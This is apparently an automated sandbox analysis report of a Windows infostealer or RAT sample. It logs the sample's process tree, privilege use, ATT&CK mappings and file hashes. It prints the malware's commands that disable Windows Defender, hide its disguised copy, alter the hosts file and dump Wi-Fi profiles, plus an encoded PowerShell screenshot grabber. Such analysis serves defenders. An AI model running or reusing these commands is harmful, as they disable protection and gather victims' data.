1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
Token: SeIncreaseQuotaPrivilege	2600	wmic.exe
Token: SeSecurityPrivilege	2600	wmic.exe
Token: SeTakeOwnershipPrivilege	2600	wmic.exe
Token: SeLoadDriverPrivilege	2600	wmic.exe
Token: SeSystemProfilePrivilege	2600	wmic.exe
Token: SeSystemtimePrivilege	2600	wmic.exe
Token: SeProfSingleProcessPrivilege	2600	wmic.exe
Token: SeIncBasePriorityPrivilege	2600	wmic.exe
Token: SeCreatePagefilePrivilege	2600	wmic.exe
Token: SeBackupPrivilege	2600	wmic.exe
Token: SeRestorePrivilege	2600	wmic.exe
Token: SeShutdownPrivilege	2600	wmic.exe
Token: SeDebugPrivilege	2600	wmic.exe
Token: SeSystemEnvironmentPrivilege	2600	wmic.exe
Token: SeRemoteShutdownPrivilege	2600	wmic.exe
Token: SeUndockPrivilege	2600	wmic.exe
Token: SeManageVolumePrivilege	2600	wmic.exe
Token: 33	2600	wmic.exe
Token: 34	2600	wmic.exe
Token: 35	2600	wmic.exe
Token: 36	2600	wmic.exe
Token: SeIncreaseQuotaPrivilege	2600	wmic.exe
Token: SeSecurityPrivilege	2600	wmic.exe
Token: SeTakeOwnershipPrivilege	2600	wmic.exe
Token: SeLoadDriverPrivilege	2600	wmic.exe
Token: SeSystemProfilePrivilege	2600	wmic.exe
Token: SeSystemtimePrivilege	2600	wmic.exe
Token: SeProfSingleProcessPrivilege	2600	wmic.exe
Token: SeIncBasePriorityPrivilege	2600	wmic.exe
Token: SeCreatePagefilePrivilege	2600	wmic.exe
Token: SeBackupPrivilege	2600	wmic.exe
Token: SeRestorePrivilege	2600	wmic.exe
Token: SeShutdownPrivilege	2600	wmic.exe
Token: SeDebugPrivilege	2600	wmic.exe
Token: SeSystemEnvironmentPrivilege	2600	wmic.exe
Token: SeRemoteShutdownPrivilege	2600	wmic.exe
Token: SeUndockPrivilege	2600	wmic.exe
Token: SeManageVolumePrivilege	2600	wmic.exe
Token: 33	2600	wmic.exe
Token: 34	2600	wmic.exe
Token: 35	2600	wmic.exe
Token: 36	2600	wmic.exe
Token: SeIncreaseQuotaPrivilege	3436	wmic.exe
Token: SeSecurityPrivilege	3436	wmic.exe
Token: SeTakeOwnershipPrivilege	3436	wmic.exe
Token: SeLoadDriverPrivilege	3436	wmic.exe
Token: SeSystemProfilePrivilege	3436	wmic.exe
Token: SeSystemtimePrivilege	3436	wmic.exe
Token: SeProfSingleProcessPrivilege	3436	wmic.exe
Token: SeIncBasePriorityPrivilege	3436	wmic.exe
Token: SeCreatePagefilePrivilege	3436	wmic.exe
Token: SeBackupPrivilege	3436	wmic.exe
Token: SeRestorePrivilege	3436	wmic.exe
Token: SeShutdownPrivilege	3436	wmic.exe
Token: SeDebugPrivilege	3436	wmic.exe
Token: SeSystemEnvironmentPrivilege	3436	wmic.exe
Token: SeRemoteShutdownPrivilege	3436	wmic.exe
Token: SeUndockPrivilege	3436	wmic.exe
Token: SeManageVolumePrivilege	3436	wmic.exe
Token: 33	3436	wmic.exe
Token: 34	3436	wmic.exe
Token: 35	3436	wmic.exe
Token: 36	3436	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1160 wrote to memory of 3068	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	84
PID 1160 wrote to memory of 3068	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	84
PID 1160 wrote to memory of 4260	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	85
PID 1160 wrote to memory of 4260	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	85
PID 1160 wrote to memory of 2600	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	86
PID 1160 wrote to memory of 2600	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	86
PID 1160 wrote to memory of 3436	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	89
PID 1160 wrote to memory of 3436	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	89
PID 1160 wrote to memory of 2624	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	90
PID 1160 wrote to memory of 2624	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	90
PID 1160 wrote to memory of 100	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	91
PID 1160 wrote to memory of 100	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	91
PID 1160 wrote to memory of 368	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	92
PID 1160 wrote to memory of 368	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	92
PID 1160 wrote to memory of 4516	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	93
PID 1160 wrote to memory of 4516	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	93
PID 1160 wrote to memory of 2328	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	94
PID 1160 wrote to memory of 2328	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	94
PID 1160 wrote to memory of 4984	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	95
PID 1160 wrote to memory of 4984	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	95
PID 1160 wrote to memory of 2240	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	96
PID 1160 wrote to memory of 2240	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	96
PID 1160 wrote to memory of 452	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	97
PID 1160 wrote to memory of 452	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	97
PID 1160 wrote to memory of 1508	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	98
PID 1160 wrote to memory of 1508	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	98
PID 1160 wrote to memory of 1208	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	100
PID 1160 wrote to memory of 1208	1160	2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe	100
PID 1208 wrote to memory of 1232	1208	powershell.exe	101
PID 1208 wrote to memory of 1232	1208	powershell.exe	101
PID 1232 wrote to memory of 3484	1232	csc.exe	102
PID 1232 wrote to memory of 3484	1232	csc.exe	102

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2240	attrib.exe
452	attrib.exe
3068	attrib.exe
4260	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
  2⤵
  - Views/modifies file attributes
  PID:3068
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4260
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2600
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024-06-27_73c265ce417e5a4d23c841f2c02d5956_ngrbot_poet-rat_sliver_snatch.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2624
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:368
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4516
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2328
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:4984
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:2240
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:452
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr0hnrfy\xr0hnrfy.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1232
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F87.tmp" "c:\Users\Admin\AppData\Local\Temp\xr0hnrfy\CSC7F3E3EE8652C4D468846DE2D491E8470.TMP"
      4⤵
      PID:3484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4F87.tmp

Filesize
1KB

MD5
3267329ca830428a2645f379a36c3e12

SHA1
0980e96a1350c03bd18067abad3d3be58d1ae432

SHA256
9ef2a7ea20fc71129f5f3a44171d49bab80f87cc1aba4865e159bd68ebc7446a

SHA512
3fbacd00e6823a8dd05c02eb97538e83186c51e1d284ad8e8b1f90adaf939a62cd6727ec3e71627c00bd7e9adf133dfd5eaffb54291e6bba1d3effa8816bbf9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtjesqax.3ue.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gbcn3JwX5D\Display (1).png

Filesize
408KB

MD5
f84cb60f93a1529ea6fb558d088787ca

SHA1
34542c9fc5758165281ffdf7ff0a79e6e82969ea

SHA256
82d18518fb0c7bba0b59ee8524ac7a3267398911c54d41f6a83037c7ed588065

SHA512
cb13c4b3a876c2d308afa3cfad7e0119c3bc4a8cd61449e6994375f533d4b5c43f3a2ddf0a650be2f7733bc6298f1e0b1181426fbdb4472ca9e3ea47786b7563

Download Submit
C:\Users\Admin\AppData\Local\Temp\xr0hnrfy\xr0hnrfy.dll

Filesize
4KB

MD5
ed41f4b6742f79b407cb756417320536

SHA1
84d78b0d2f960b174108c34b1a6a4907ab1a891b

SHA256
9058651e99a5d2de0715756501ce1761a122e46ba3bf7c7b547a05087e378174

SHA512
53f096a72643f49439ba069f20cd8cde2ab6f95746d00d2ae823b7d4892b520059fd02e6f94c9b8e193fc109ebe97ab4b3fc4401f8165dfb52d4108af0aeb59e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
73c265ce417e5a4d23c841f2c02d5956

SHA1
902c82c28a7f09f42d14c69bc0c50e17f037698b

SHA256
cc208b61c6aa312b4d2321f0397423c9b19a271f3b0753a8d0c2e020c73d10ca

SHA512
6d4beac332adc5f8df96aa2fb99c106e1cc1ee24a003b19305de9ffec0077ed7c0d539742662016f5f804fd9cadfa108c5e2e90e1bc04b5edd52714f7330d045

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xr0hnrfy\CSC7F3E3EE8652C4D468846DE2D491E8470.TMP

Filesize
652B

MD5
030ca554f6f853b4fa3b99601a8febb3

SHA1
008608e644038487413a1eceb4a647a7234c3214

SHA256
4223f792fce8fba26d20cf583540e03cf2e74be76eec358a45f7e3045697bf6f

SHA512
0b36856ccfbc72eec86637cccef5547aa7c642c555fbde9f94e260e33dd4636f185a6d7c2b23aac45b9614e65f05444737cbcf825548fc7ecb914bde03111505

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xr0hnrfy\xr0hnrfy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xr0hnrfy\xr0hnrfy.cmdline

Filesize
607B

MD5
0b51bf6e152ee6e4aa9c3a52c4e9c610

SHA1
7003f4f374ac374da3116282a832f9f703540f76

SHA256
d846f087532744feeb54dcd0ddb6cac009b8773abed3755216d54fb80e64e402

SHA512
51ac949312bc1c2039ad0b3eb04cde92f6eb7ed0ea8c6ebd0277d7d18d54c0b16f222035b0a7c98c5af13d706b0e05fcf0bf4d4784a506384f76c349f9cd2d3c

Download Submit
memory/1208-65-0x0000028975DF0000-0x0000028975DF8000-memory.dmp

Filesize
32KB

Download
memory/2624-12-0x0000021C3CB90000-0x0000021C3CBB2000-memory.dmp

Filesize
136KB

Download